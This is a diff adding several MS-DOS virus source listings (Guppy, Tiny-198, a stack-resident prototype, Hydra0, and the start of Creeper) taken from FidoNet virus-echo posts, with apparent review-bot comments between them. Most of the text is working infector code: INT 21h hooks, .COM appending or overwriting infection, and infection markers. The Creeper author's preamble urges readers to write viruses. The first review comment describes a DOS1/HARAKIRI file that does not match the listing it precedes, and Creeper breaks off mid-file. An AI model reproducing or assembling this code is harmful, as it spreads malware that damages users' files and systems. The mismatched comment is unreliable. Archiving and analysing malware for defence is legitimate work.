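Review bot: The content of this file does not match its own header: the preamble describes the TridenT DOS1 virus (`;DOS1 virus by the TridenT research group - Direct Action appending .COM`, FCB-based, with a debug-script stub), but directly after `; Then use the following commands:` the text continues with a Turbo Pascal program (`; Debug '); If Debug then Writeln (Myfile);`, `Procedure Search_4_File`, `Writeln ('Your PC is alive and infected with the HARAKIRI virus!')`) whose closing tearline (`-+- GoldED/386`) lacks the `;` prefix used everywhere else in the listing. Whether the splice happened upstream or in transcription cannot be told from here, but as added the file is neither assemblable nor the DOS1 listing its name and `+195` line count promise. I would verify against the originating message before merging and either restore the DOS1 body or rename the file to the HARAKIRI (Pascal) sample it actually holds, with a first line such as `{ HARAKIRI: Turbo Pascal directory walker, infects *.exe then *.com from '\', halts with a fake "Program too big to fit in memory" after 4 infections; DOS1 asm body missing }`.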
@@ -0,0 +1,191 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 20 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:13 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : GUPPY.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Mikko Hypponen, 2:283/718 (06 Nov 94 16:39) +;* To : Brad Frazee +;* Subj : GUPPY.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Mikko.Hypponen@f718.n283.z2.fidonet.org +;*************************************************************************** +;* The Guppy Virus * +;* Disassembly by Black Wolf * +;*************************************************************************** +;* The Guppy virus is a relatively simple, very small, resident .COM * +;*infector. It uses the standard way for a regular program to go resident * +;*(i.e. Int 27) which makes the infected program terminate the first time * +;*run. After that, however, infected files will run perfectly. This virus* +;*uses interesting methods to restore the storage bytes, as well as a * +;*strange technique to restore control to an infected file after it has * +;*already gone memory resident. * +;* * +;*Note: The Guppy virus was originally assembled with an assembler other * +;* than Tasm, so to keep it exactly the same some commands must be * +;* entered directly as individual bytes. In these cases, the command * +;* is commented out and the bytes are found below it. 
* +;* * +;*************************************************************************** + +.model tiny +.radix 16 +.code + + org 100h +start: + call Get_Offset + +Get_Offset: + pop si ;SI = offset of vir + + ;(Get_Offset-Start) + mov ax,3521h + mov bx,ax + int 21h ;Get Int 21 Address + + mov ds:[si+Int_21_Offset-103],bx ;Save old Int 21 + mov ds:[si+Int_21_Segment-103],es + + ;mov dx,si ;Bytes vary between assemblers + db 89,0f2 + + ;add dx,offset Int_21_Handler-104 + db 83,0c2,1f + + mov ah,25h + int 21h ;Set Int 21 + + inc dh ;Add 100h bytes to go resident + ;from handler + push cs + pop es + int 27h ;Terminate & stay resident + + +Int_21_Handler: + cmp ax,4B00h ;Is call a Load & Execute? + je Infect ;Yes? Jump Infect + + cmp al,21h ;Might it be a residency check? + jne Go_Int_21 ;No? Restore control to Int 21 + + ;cmp ax,bx ;Are AX and BX the same? + db 39,0d8 + + jne Go_Int_21 ;No, Restore control to Int 21 + + push word ptr [si+3dh] ;3dh = offset of Storage_Bytes - + ;Get_Offset + + ;This gets the first word of + ;storage bytes, which is then + ;popped to CS:100 to restore it. + + mov bx,offset ds:[100] ;100 = Beginning of COM + pop word ptr [bx] + + mov cl,[si+3Fh] ;Restore third storage byte. + mov [bx+2],cl + +Restore_Control: + pop cx + push bx + iret ;Jump back to Host program. + +Storage_Bytes db 0, 0, 0 + +Infect: + push ax + push bx + push dx + push ds + mov ax,3D02h + int 21h ;Open File for Read/Write Access + + xchg ax,bx + call Get_Offset_Two + +Get_Offset_Two: + pop si + push cs + pop ds + mov ah,3F + mov cx,3 + sub si,10 ;Set SI=Storage_Bytes + + ;mov dx,si + db 89,0f2 + + int 21h ;Read first 3 bytes of file + + cmp byte ptr [si],0E9h ;Is the first command a jump? + jne Close_File ;No? 
Jump to Close_File + mov ax,4202h + xor dx,dx + xor cx,cx + int 21h ;Go to end of file + + xchg ax,di + mov ah,40h + mov cl,98h ;Virus Size + + ;mov dx,si + db 89,0f2 + + sub dx,40h ;Beginning of virus + int 21h ;Append virus to new host + + mov ax,4200h + xor cx,cx + xor dx,dx + int 21h ;Go back to beginning of file + + mov cl,3 + + ;sub di,cx + db 29,0cf + + mov [si+1],di + mov ah,40h + + ;mov dx,si + db 89,0f2 + + int 21h ;Write 3 byte jump to file + +Close_File: + mov ah,3Eh + int 21h + + pop ds + pop dx + pop bx + pop ax +Go_Int_21: + db 0EAh ;Go On With Int 21 +Int_21_Offset dw ? +Int_21_Segment dw ? + +end start + +;-+- UC2 Support France +; + Origin: NETTIS Public Acces Internet (603)432-2517 (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/d Warn if duplicate symbols in libraries +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir31.asm b/MSDOS/Virus.MSDOS.Unknown.vir31.asm new file mode 100644 index 00000000..8555dcac --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir31.asm 
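Review bot: The `Infect` path writes no infection marker: the only precondition is `cmp byte ptr [si],0E9h ; Is the first command a jump?`, and the final write (`mov cl,3 … mov [si+1],di … int 21h`) stores just `E9 disp16`, so an already-infected host (which now starts with E9h) passes the check and, as the listing reads, gets another 98h-byte copy appended on each EXEC while the virus is resident. The header ('relatively simple, very small, resident .COM infector') should say so, e.g. `;* No infection marker: any host whose first byte is E9h is re-appended (98h bytes) on each EXEC, so infected files grow without bound. *`. A line at `Storage_Bytes db 0, 0, 0` would also replace the header's 'strange technique' with the mechanism: the 3 bytes read there during infection travel inside the appended body (`sub dx,40h`), and the resident handler later restores them from the calling host's own copy via `push word ptr [si+3dh]` with the host's DS/SI still in effect.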
@@ -0,0 +1,231 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 21 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:13 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : TINY_198.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Mikko Hypponen, 2:283/718 (06 Nov 94 16:40) +;* To : Gilbert Holleman +;* Subj : TINY_198.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Mikko.Hypponen@f718.n283.z2.fidonet.org + page ,132 + name TINY198 + title The 'Tiny' virus, version TINY-198 + .radix 16 + +; ͻ +; Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 +; Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 +; +; The 'Tiny' Virus, version TINY-198 +; Disassembled by Vesselin Bontchev, July 1990 +; +; Copyright (c) Vesselin Bontchev 1989, 1990 +; +; This listing is only to be made available to virus researchers +; or software writers on a need-to-know basis. +; ͼ + +; The disassembly has been tested by re-assembly using MASM 5.0. 
+ +code segment + assume cs:code, ds:code + + org 100 + +seg_60 equ 600 +v_len equ v_end-v_entry + +start: + jmp v_entry ; Jump to virus code + db 'M' ; Virus signature + mov ax,4C00 ; Program terminate + int 21 + +v_entry: + call self ; Determine the start addres of the virus body +self: + pop si + sub si,3 + + push ax ; Save AX (to keep programs as DISKCOPY happy) + +; Check whether the virus is already in memory and just run the program if so: + + mov ah,0E9 + int 21 + + mov di,seg_60 ; Point ES:DI at 0000:0600h (i.e, segment 60h) + xor cx,cx ; ES := 0 + mov es,cx + mov cl,v_len ; CX := virus length + rep movsb ; Move the virus body there + +; Transfer control to cont: by PUSHing its address +; on the stack and executing RETF: + + push es + mov ax,cont-v_entry+seg_60 + push ax + retf + +; The original first 4 bytes of the infected file: + +first4 db 0EBh, 2, 90, 90 + +; Resume execution from here (but already in segment 60h): + +cont: + +; Install new INT 21h handler and move the old one at INT 32h: + + mov di,21*4 + mov cl,2 + mov ax,int_21-v_entry+seg_60 + cld +lp: + push word ptr es:[di] ; Get old handler's address + pop word ptr es:[di+(32-21)*4] ; Move it at INT 32h + stosw ; Install the new one + mov ax,cs + loop lp ; Loop until done + +; Save the original first 4 bytes of the infected program on the stack: + + push word ptr cs:[first4-v_entry+seg_60] + push word ptr cs:[first4+2-v_entry+seg_60] + +run_pgm: + mov di,offset start ; Point DI at program's start + pop word ptr [di+2] ; Restore the first 4 bytes of the program + pop word ptr [di] + pop ax ; Restore the original value of AX + push ds + push ds ; ES := DS + pop es + push di ; Push 100h on the stack + retf + +mem_chk: + +; Push the original first 4 bytes of the infected program on the stack: + + push word ptr [si+first4-v_entry] + push word ptr [si+first4+2-v_entry] + jmp run_pgm ; And run the original program + +int_21: ; New INT 21h handler + cmp ah,0E9 ; Memory check? 
+ je mem_chk ; If infected, run the original program + cmp ax,4B00 ; EXEC function call? + jne end_21 ; Exit if not + + push ax ; Save registers used + push bx + push cx + push dx + push di + push ds + push es + + push cs ; ES := CS + pop es + + mov ax,3D02 ; Open the file for both reading and writting + int 32 + jc end_exec ; Exit on error + mov bx,ax ; Save the file handle in BX + + mov ah,3F ; Read the first 4 bytes of the file + mov cx,4 ; 4 bytes to read + mov dx,first4-v_entry+seg_60 ; Put them in first4 + mov di,dx ; Save first4 address in DI + push cs ; DS := CS + pop ds + int 32 ; Do it + +; Check whether the file is already infected or is an .EXE file. +; The former contains the character `M' in its 3rd byte and +; the latter contains it either in the 0th or in the 1st byte. + + push di ; Save DI + mov al,'M' ; Look for `M' + repne scasb + pop di ; Restore DI + je close ; Exit if file not suitable for infection + + mov ax,4202 ; Seek to the end of file + xor cx,cx + xor dx,dx + int 32 ; Do it + + push ax ; Save file length + + mov dh,6 ; DX = 600h, i.e. 
point it at 0000:0600h + mov cl,v_len ; Length of virus body + mov ah,40 ; Append virus to file + int 32 ; Do it + + mov ax,4200 ; Seek to the file beginning + xor cx,cx + xor dx,dx + int 32 ; Do it + + mov dx,di ; Point DX at first4 + mov al,0E9 ; Near JMP opcode + stosb ; Form the first instruction of the file + pop ax ; Restore file length in AX + sub ax,3 ; Subtract 3 (first instruction length) + stosw ; Form the JMP's opperand + mov al,'M' ; Add a `M' character to mark the file + stosb ; as infected + + mov cl,4 ; Overwrite the first 4 bytes of the file + mov ah,40 + int 32 ; Do it + +close: + mov ah,3E ; Close the file + int 32 + +end_exec: + pop es ; Restore used registers + pop ds + pop di + pop dx + pop cx + pop bx + pop ax + +; Exit through the original INT 21h handler: + +end_21: + jmp dword ptr cs:[32*4] + +v_end equ $ ; End of virus body + +code ends + end start + +;-+- FMail 0.96 +; + Origin: This virus is Microsoft Windows (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/iPATH Search PATH for include files +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir32.asm b/MSDOS/Virus.MSDOS.Unknown.vir32.asm new file mode 100644 index 00000000..07a9d88d --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir32.asm 
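Review bot: The comment `pop ax ; Restore the original value of AX` in `run_pgm` holds only on the install path; on the already-resident path (`mov ah,0E9 / int 21` → `cmp ah,0E9 / je mem_chk` → `jmp run_pgm`) the handler never executes `iret`, so after the two `pop word ptr [di…]` the next word on the stack is the INT 21h return IP rather than the AX saved before the `int 21`, and the closing `retf` leaves CS, FLAGS and that AX behind — the host then starts with AX equal to the return offset, SP six bytes low and, if I read the INT semantics right, IF still cleared until its first DOS call. This is a property of the sample rather than something to repair, but the listing should not claim otherwise: `pop ax ; Restore AX (install path only: on the mem_chk path this pops the INT 21h return IP; CS/FLAGS/AX stay on the stack)`. A header IOC line would also help, because this variant has a second detectable hook besides the INT 32h trampoline: `; IOC: INT 21h AH=E9h is answered by the resident copy and never reaches DOS; body at 0000:0600h; host begins E9 xx xx 'M'`.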
@@ -0,0 +1,229 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 22 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:13 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : STACKVIR.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Graham Allen, 2:283/718 (06 Nov 94 16:43) +;* To : Edwin Cleton +;* Subj : STACKVIR.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Graham.Allen@f718.n283.z2.fidonet.org +; +; +; V I R U S P R O T O T Y P E +; +; Author : Waleri Todorov, CICTT, (C)-Copyright 1991, All Rights Rsrvd +; Date : 25 Jan 1991 21:05 +; Function : Found DOS stack in put himself in it. Then trace DOS +; function EXEC and type 'Infect File' +; +; +; If you want to have fun with this program just run file STACK.COM +; Don't worry, this is not a virus yet, just try to find him in memory +; with PCTools and/or MAPMEM. If you can -> just erase the source - it is +; useless for you. If you can't -> you don't have to look at it - it is too +; difficult to you to understand it. 
+; Best regards, Waleri Todorov +; +; + + + + + mov ah,52h ; Get DOS segmenty + int 21h + + cmp ax,1234h ; Also check for already here + jne Install ; If not -> install in memory +ReturnControl + + int 20h ; This program will give control + ; to main file +Install + mov ax,es ; mov DOS segment in AX + mov DosSeg,ax ; Save DOS segment for further usage + mov ds,ax ; DS now point in DOS segment + + call SearchDos ; Search DOS entry point + call SearchStack ; Search DOS stack + + push cs ; DS=ES=CS + push cs + pop ds + pop es + + mov ax,DosSeg ; get DOS segment in AX + mov cl,4 ; AX*=16 + shl ax,cl + mov bx,StackOff ; Stack new begin in BX + and bx,0FFF0h ; Mask low 4 bit + add ax,bx ; Compute new real address + mov cl,4 ; AX/=16 + shr ax,cl ; Now we get SEGMENT:0000 + sub ax,10h ; Segment-=10-> SEG:100h + mov StackOff,ax ; Save new segment for further usage + mov es,ax ; ES point in DOS New area + mov si,100h ; ES:DI -> DOS:free_space_in_stack + mov di,si ; DS:SI Current segment + mov cx,512d ; Virus is only 512 bytes long + rep movsb ; Move virus to new place + +; Installing virus in DOS' stack we will avoid a conflict with PCTools, +; MAPMEM, and other sys software. Remark, that no one DOS buffer wasn't +; affected, so if you have program, that count DOS' buffers to found +; Beast666, she won't found anything. +; In further release of full virus I will include anti-debugger system, +; so you will not be able to trace virus + + mov di,DosOff ; ES:DI point to DOS int21 entry point + mov ax,DosSeg + mov es,ax + mov al,0EAh ; JMP XXXX:YYYY + stosb + mov ax,offset Entry21 + stosw ; New 21 handler's offset + mov ax,StackOff + stosw ; New 21 handler's segment + + +; Now DOS will make far jump to virus. In case that virus won't +; get vector 21 directly, MAPMEM-like utilities won't show int 21 catching, +; and DOSEDIT will operate correctly (with several virus he don't). 
+ + inc di + inc di + mov Int21off,di ; Virus will call DOS after jump + jmp ReturnControl ; Return control to file + +; At this moment, return control is just terminate program via int 20h. +; In further release of full virus this subroutine will be able to +; return control to any file (COM or EXE). + + + +; These are two scanners subroutine. All they do are scanning DOS segment +; for several well-known bytes. Then they update some iternal variables. +; Be patience, when debug this area! + +SearchDos + mov ax,cs:[DosSeg] + mov ds,ax + xor si,si + +Search1 + lodsw + cmp ax,3A2Eh + je NextDos1 + dec si + jmp short Search1 +NextDos1 + lodsb + cmp al,26h + je LastDos + sub si,2 + jmp short Search1 +LastDos + inc si + inc si + lodsb + cmp al,77h + je FoundDos + sub si,5 + jmp short Search1 +FoundDos + inc si + mov cs:[Int21off],si + sub si,7 + mov cs:[DosOff],si + ret + +SearchStack + xor si,si +Search2 + lodsw + cmp ax,0CB8Ch + je NextStack1 + dec si + jmp short Search2 +NextStack1 + lodsw + cmp ax,0D38Eh + je NextStack2 + sub si,3 + jmp short Search2 +NextStack2 + lodsb + cmp al,0BCh + je FoundStack + sub si,4 + jmp short Search2 +FoundStack + mov di,si + lodsw + sub ax,200h + stosw + mov cs:[StackOff],ax + ret + +Entry21 ; Here is new int 21 handler + cmp ah,52h ; If GET_LIST_OF_LISTS + jne NextCheck + + mov ax,1234h ; then probably I am here + mov bx,cs:[DosSeg] ; so return special bytes in AX + mov es,bx + mov bx,26h + iret ; Terminate AH=52h->return to caller +NextCheck + cmp ax,4B00h ; If EXEC file + jne GoDos + call Infect ; then file will be infected +GoDos + jmp dword ptr cs:[Int21off] + ; Otherwise jump to DOS +Infect + push ds ; At this moment just write on screen + push dx + push ax + + push cs + pop ds + mov dx,offset Txt + mov ah,9 +CallDos + pushf ; Call real DOS + call dword ptr cs:[Int21off] + + pop ax + pop dx + pop ds + ret + +Int21off dw 0 ; Offset of DOS 21 AFTER jump to virus +DosSeg dw 0 ; DOS segment +StackOff dw 0 ; Offset of stack/New 
segment +DosOff dw 0 ; Offset of DOS 21 BEFIRE jump +Txt db 'Infect File$' ; Dummy text + +;-+- FMail 0.96 +; + Origin: FidoNet * Mathieu Notris * Brussels-Belgium-Europe (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/Twx Windows image +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir33.asm b/MSDOS/Virus.MSDOS.Unknown.vir33.asm new file mode 100644 index 00000000..42dec4ac --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir33.asm 
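Review bot: The data-area comments at the end of the file under-document `StackOff`, which is the variable a reader of this archival sample most needs to follow: `SearchStack` first stores a stack offset into it (`mov cs:[StackOff],ax`), `Install` then overwrites it with the computed segment (`mov StackOff,ax ; Save new segment for further usage`), and that segment is finally emitted as the far-jump target of the patched INT 21h entry (`mov ax,StackOff / stosw`). Suggested replacements for the two comments: `StackOff dw 0 ; SearchStack: offset inside the DOS stack; after Install: segment of the relocated body` and `DosOff dw 0 ; Offset of the DOS INT 21h entry BEFORE the far jump is patched in` (also fixes the `BEFIRE` typo). The `Function :` line of the header would also help an analyst if it stated that the resident check is the AH=52h call answered with AX=1234h by `Entry21`, since the file's own comments only say "Also check for already here" without naming the mechanism.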
@@ -0,0 +1,228 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 23 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:13 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : HYDRA_0.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Gilbert Holleman, 2:283/718 (06 Nov 94 16:44) +;* To : Mark Hapershaw +;* Subj : HYDRA_0.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Gilbert.Holleman@f718.n283.z2.fidonet.org +PAGE 59,132 + +; +; +; HYDRA0 +; +; +; Disassembly by: -=>Wasp<=- aka >>Night Crawler<< +; +; Reassemble with TASM 2.0 +; + +DATA_1E EQU 80H +DATA_18E EQU 2E0H +DATA_19E EQU 2E3H + +SEG_A SEGMENT BYTE PUBLIC + ASSUME CS:SEG_A, DS:SEG_A + + + ORG 100h + +HYDRA0 PROC FAR + +START: + JMP LOC_1 ; (0225) + DB 59H, 44H, 00H, 00H +DATA_4 DB 'HyDra Beta - Not For Release' + DB '. *.CO?' + DB 0 +DATA_7 DW 0, 84FCH +DATA_9 DW 0 +DATA_10 DB 0 + DB 29 DUP (0) +DATA_11 DB 0 + DB 13 DUP (0) +COPYRIGHT DB 'Copyright (c)' +DATA_12 DB ' 1991 by C.A.V.E. HYDRA$' + DB 'Watch for the many heads.', 0DH, 0AH + DB 0DH, 0AH, 0DH, 0AH, 0DH, 0AH, 0DH + DB 0AH, 0DH, 0AH, 0DH, 0AH, 'The fir' + DB 'st eight are easy to find and ki' + DB 'll.', 0DH, 0AH, 0DH, 0AH, 'Their' + DB ' replacements will be more sophi' + DB 'sticated.$' + DB '(c) 1991 - C. A. V. 
E.$' +LOC_1: + PUSH AX + MOV AX,CS + ADD AX,1000H + XOR DI,DI ; Zero register + MOV CX,2E0H + MOV SI,OFFSET DS:[100H] + MOV ES,AX + REP MOVSB ; Rep when cx >0 Mov [si] to es:[di] + MOV AH,1AH + MOV DX,OFFSET DATA_10 + INT 21H ; DOS Services ah=function 1Ah + ; set DTA to ds:dx + MOV AH,4EH ; 'N' + MOV DX,OFFSET DATA_4+22H + INT 21H ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + JC LOC_5 ; Jump if carry Set +LOC_2: + MOV AH,3DH ; '=' + MOV AL,2 + MOV DX,OFFSET DATA_11 + MOV AL,2 + INT 21H ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + MOV BX,AX + PUSH ES + POP DS + MOV AX,3F00H + MOV CX,0FFFFH + MOV DX,DATA_18E + INT 21H ; DOS Services ah=function 3Fh + ; read file, cx=bytes, to ds:dx + ADD AX,2E0H + MOV CS:DATA_9,AX + CMP WORD PTR DS:DATA_19E,4459H + JNE LOC_3 ; Jump if not equal + MOV AH,3EH ; '>' + INT 21H ; DOS Services ah=function 3Eh + ; close file, bx=file handle + PUSH CS + POP DS + MOV AH,4FH ; 'O' + INT 21H ; DOS Services ah=function 4Fh + ; find next filename match + JC LOC_6 ; Jump if carry Set + JMP SHORT LOC_2 ; (0247) +LOC_3: + XOR CX,CX ; Zero register + MOV DX,CX + MOV AX,4200H + INT 21H ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + JC LOC_4 ; Jump if carry Set + MOV AH,40H ; '@' + XOR DX,DX ; Zero register + MOV CX,CS:DATA_9 + INT 21H ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx +LOC_4: + MOV AH,3EH ; '>' + INT 21H ; DOS Services ah=function 3Eh + ; close file, bx=file handle + PUSH CS + POP DS +LOC_5: + MOV AH,1AH + MOV DX,DATA_1E + INT 21H ; DOS Services ah=function 1Ah + ; set DTA to ds:dx + JMP SHORT LOC_7 ; (02F0) + DB 90H +LOC_6: + PUSH DX + XOR AX,AX ; Zero register + MOV AX,0F00H + INT 10H ; Video display ah=functn 0Fh + ; get state, al=mode, bh=page + MOV AH,0 + INT 10H ; Video display ah=functn 00h + ; set display mode in al + MOV AX,200H + MOV DH,6 + MOV DL,25H ; '%' + INT 10H ; Video display ah=functn 02h + ; set cursor location in dx + XOR DX,DX ; Zero 
register + MOV DX,OFFSET DATA_12+14H + MOV AH,9 + INT 21H ; DOS Services ah=function 09h + ; display char string at ds:dx + MOV AX,200H + MOV DH,0BH + MOV DL,1BH + INT 10H ; Video display ah=functn 02h + ; set cursor location in dx + MOV DX,OFFSET DATA_12+1AH + MOV AH,9 + INT 21H ; DOS Services ah=function 09h + ; display char string at ds:dx + MOV AX,200H + MOV DH,17H + MOV DL,0 + INT 10H ; Video display ah=functn 02h + ; set cursor location in dx + MOV DX,OFFSET DATA_12+9EH + MOV AH,9 + INT 21H ; DOS Services ah=function 09h + ; display char string at ds:dx + MOV AX,200H + MOV DH,18H + MOV DL,0 + INT 10H ; Video display ah=functn 02h + ; set cursor location in dx + MOV AX,4C00H + INT 21H ; DOS Services ah=function 4Ch + ; terminate with al=return code +LOC_7: + XOR DI,DI ; Zero register + MOV SI,OFFSET DATA_16 + MOV CX,0D3H + REP MOVSB ; Rep when cx >0 Mov [si] to es:[di] + POP BX + MOV CS:DATA_7,0 + MOV WORD PTR CS:DATA_7+2,ES + POP BX + JMP DWORD PTR CS:DATA_7 +DATA_16 DB 1EH + DB 07H,0B9H,0FFH,0FFH,0BEH,0E0H + DB 03H,0BFH, 00H, 01H, 2BH,0CEH + DB 0F3H,0A4H, 2EH,0C7H, 06H, 00H + DB 01H, 00H, 01H, 2EH, 8CH, 1EH + DB 02H, 01H, 8BH,0C3H, 2EH,0FFH + DB 2EH, 00H, 01H + DB ' Coalition of American Viru' + DB 's Engineers -=-=- ' + DB ' Dedicated to supporting the' + DB ' anti-virus industry withou' + DB 't recognition or reward. ' + DB ' -=-=- ' + DB 0CDH, 20H + +HYDRA0 ENDP + +SEG_A ENDS + + + + END START + +;-+- PPoint 1.86 +; + Origin: **SERMEDITECH BBS** Soissons FR (+33) 23.73.02.51 (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;Options: /m = map file with publics +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) +; diff --git a/MSDOS/Virus.MSDOS.Unknown.vir34.asm b/MSDOS/Virus.MSDOS.Unknown.vir34.asm new file mode 100644 index 00000000..7245f632 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir34.asm 
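Review bot: The infection-marker test `CMP WORD PTR DS:DATA_19E,4459H` carries no comment, although it is the line an analyst of this disassembly most needs explained: 4459H is the little-endian image of the `DB 59H, 44H` placed right after `JMP LOC_1` at START+3, and DATA_19E (2E3H) is that same +3 offset inside the copy read to DATA_18E (2E0H), so the compare checks whether the candidate file already carries the marker. Suggested comment: `; already marked? word at +3 of the read copy == 59H,44H ('YD') stored after START`. The raw byte run at `DATA_16` is likewise undocumented even though `LOC_7` copies 0D3H bytes of it to ES:0000 and then jumps there through `DATA_7` (`MOV CS:DATA_7,0 / MOV WORD PTR CS:DATA_7+2,ES / JMP DWORD PTR CS:DATA_7`); a one-line comment stating that this block is executed as code, not data, would stop the next reader from treating it as a string table.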
@@ -0,0 +1,361 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 24 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:13 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : CREEPER.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Ron Toler, 2:283/718 (06 Nov 94 16:45) +;* To : Mike Salvino +;* Subj : CREEPER.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Ron.Toler@f718.n283.z2.fidonet.org +; +; Demoralized Youth proudly presents: Creeper v1.0, Original Source +; +; Written by: TORMENTOR +; +; Yez, here it is... It's not like 4096 or Pogue, but it's a virus! +; The reason why I release the original source is that I think I +; can't do much more on this virus... I will start from scratch +; and write a larger and more smarter EXE-virus... +; And if I release this source maybe YOU will get some god ideas and +; write your own virus (or rewrite this!)... +; And if you do, Great! Feel free to mix with it as much as you want +; but please don't change this file! +; Well, go on and write virus! The world is to safe! +; +; +; Regards / TORMENTOR +; + +code segment byte public + assume cs:code, ds:code, es:code, ss:code + + + org 100h + + +codebeg: + + + mov ax,043FFh ; Remove virus from code! + int 21h + +; Let's allocate some mem! 
+ + mov ax,ds + sub ax,11h + mov ds,ax + cmp byte ptr ds:[0100h],5Ah + jnz skip + mov ax,ds:[0103h] + sub ax,40h + jb skip + mov ds:[0103h],ax + sub word ptr ds:[0112h],50h + mov es,ds:[0112h] + push cs + pop ds + mov cx,code_end-codebeg + mov di,100h + push di + mov si,di + rep movsb + + push es + pop ds + + mov ax,351Ch + int 21h + mov word ptr ds:[int1Cret],bx + mov word ptr ds:[int1Cret+2],es + mov al,21h + int 21h + mov word ptr ds:[real21+1],bx + mov word ptr ds:[real21+3],es + + mov ah,25h + mov dx,offset int21beg + int 21h + mov al,1Ch + mov dx,offset int1Cnew + int 21h + + push cs + push cs + pop es + pop ds + + ret + +skip: int 20h + + +int21beg: push ax + sub ax,4B00h + jz infect + pop ax + cmp ax,043FFh ; Check if Harakiri. + jne real21 + + mov ax,word ptr ds:[retdata] + mov si,ax + mov di,100h + mov cx,code_end-codebeg + rep movsb + + mov ax,100h + + pop cx + pop cx + push es + push ax + iret + +real21: db 0EAh, 00h, 00h, 00h, 00h ; Jump to org21vec. + + +retdata: db 00h, 00h + +f_time: dw 0000h + +f_date: dw 0000h + +infect: pop ax + + push ax + push bx + push cx + push di + push ds + push dx + push si + + + mov ah,43h ; Get file attr. + int 21h + mov ax,4301h + and cx,0FEh ; Strip the Read-only-flag + int 21h + + mov ax,3D02h ; Open victim. + int 21h + + xchg ax,bx + + call sub_2 + +sub_2: mov di,sp ; God what I hate that Eskimo! + mov si,ss:[di] + inc sp + inc sp + + push cs + pop ds + + mov ax,5700h ; Get file's time and date + int 21h + mov [si-(sub_2-f_time)],cx + mov [si-(sub_2-f_date)],dx ; And save them... + + mov ah,3Fh ; Read X byte from begin. + mov cx,code_end-codebeg + add si,code_end-sub_2 ; SI points to EOF + mov dx,si + int 21h + + + cmp word ptr [si],'MZ' ; Mark Zimbowski? + je close + cmp word ptr [si],'ZM' ; Zimbowski Mark? + je close +mark: cmp word ptr [si+(mark-codebeg+4)],'YD' ; infected? 
